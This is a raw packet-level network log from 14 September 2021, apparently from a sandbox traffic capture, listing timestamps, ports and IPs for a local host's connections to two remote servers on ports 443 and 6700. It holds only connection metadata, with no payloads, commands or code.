Sep 14, 2021 21:24:32.375009060 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.375108004 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.375111103 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.375154018 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.375225067 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.375252008 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.375355959 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.375468969 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.375601053 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.375701904 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.375797033 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.375890970 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.375989914 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.376085043 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.376267910 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.376357079 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.376471043 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.376569033 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.376775980 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.376872063 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.377315998 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.377409935 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.377563000 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.377656937 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.377926111 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.378024101 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.378031969 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.378063917 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.378124952 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.378151894 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.378453970 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.378542900 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.378756046 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.378854036 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.398308992 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.398416042 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.398422003 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.398432016 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.398490906 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.398503065 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.398514986 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.398519993 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.398575068 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.399007082 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.399072886 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.399089098 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.399096966 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.399169922 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.399378061 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.399456024 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.399878025 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.399962902 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.399995089 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.400015116 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.400027037 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.400196075 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.400239944 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.400252104 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.400269032 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.400312901 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.400352001 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.400418997 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.400578976 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.400652885 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.400738955 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.400813103 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.400851965 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.400909901 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.405633926 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.405718088 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.405807972 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.405879021 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.406049013 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.406122923 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.406202078 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.406275034 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.406394958 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.406471968 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.406588078 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.406656981 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.406760931 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.406821012 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.406910896 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.407012939 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.407042027 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.407108068 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.407186031 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.407275915 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.407278061 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.407321930 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.407367945 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.407377005 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.407630920 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:25:03.746161938 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:03.932473898 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:03.932672024 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:04.240633011 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:04.439521074 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:04.458026886 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:04.644783974 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:04.686713934 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:04.919306993 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:04.919430017 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:04.926280022 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:04.926311970 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:04.926333904 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:04.926358938 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:04.926399946 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:04.926476002 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.112679005 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.112725973 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.112752914 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.112781048 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.112822056 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.112869978 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.112874031 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.112993956 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.113040924 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.113070965 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.113090038 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.113130093 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.299457073 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299484968 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299511909 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299530983 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299539089 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.299549103 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299571037 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299587965 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.299602032 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299622059 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.299622059 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299642086 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299668074 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299678087 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.299685955 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299725056 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.299751997 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299815893 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299854040 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.299880028 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.299932957 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.299945116 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.300012112 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.300054073 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.489578009 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.489617109 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.489640951 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.489665985 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.489697933 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.489797115 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.490461111 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.490492105 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.490518093 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.490545034 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.490570068 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.490595102 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.490628958 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.490720987 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.491055012 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.491786957 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.492099047 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.492140055 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.492482901 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.492618084 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.493556976 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493582964 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493603945 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493623018 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493643045 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493657112 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.493721008 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493737936 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493750095 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.493756056 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493772030 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493796110 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.493839025 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493858099 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.493869066 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.493885994 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.494148970 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.494179010 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.494237900 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.494530916 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.676572084 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.676600933 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.676623106 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.676700115 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.676736116 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.676784039 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.676815987 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.676839113 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.676856995 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.676866055 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.676886082 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.676913977 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.677083969 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.678653955 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.678684950 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.678710938 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.678761005 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.678776979 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.678780079 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.678802013 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.678828001 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.678864956 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.678909063 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.678910017 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.678972006 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679002047 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679037094 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679069042 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679136038 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679140091 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679240942 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679270029 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679321051 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679336071 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679358959 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679420948 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679435015 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679459095 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679491043 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679553986 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679636002 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679662943 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679687023 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679702997 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679719925 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679738045 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679757118 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679796934 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.679831982 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.679893970 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.680680037 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.680706978 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.680751085 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.680773973 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.680839062 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.680844069 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.680866003 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.680907965 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.680931091 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.680963039 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.680993080 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681034088 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681086063 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681168079 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681196928 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681209087 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681232929 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681361914 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681420088 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681494951 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681519032 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681576014 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681595087 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681670904 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681713104 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681730032 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681777954 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681804895 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681849003 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681884050 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681905031 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681905031 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.681951046 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.681962967 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.682008028 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.682028055 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.682085991 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.863677025 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.863862991 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.866143942 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.866179943 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.866204977 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.866231918 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.866240025 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.866252899 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:05.866255045 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.866281033 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.866594076 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:05.873394966 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.044362068 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.044483900 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.049969912 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.051336050 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.052593946 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.052685976 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.052714109 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.052715063 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.052741051 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.052764893 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.052793026 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.052814007 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.052916050 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.052943945 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.052958012 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.052994967 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.053062916 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.053088903 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.053108931 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.053131104 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.053203106 CEST	6700	49694	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:06.053230047 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:06.053308964 CEST	49694	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:10.187331915 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:10.373420954 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:10.373755932 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:10.377545118 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:10.579087973 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:10.579838991 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:10.766447067 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:10.771409035 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.007661104 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.007755041 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.007854939 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.007894993 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.007980108 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.008022070 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.008040905 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.008059978 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.194998026 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.195069075 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.195197105 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.195255995 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.195349932 CEST	6700	49695	194.147.140.20	192.168.2.5
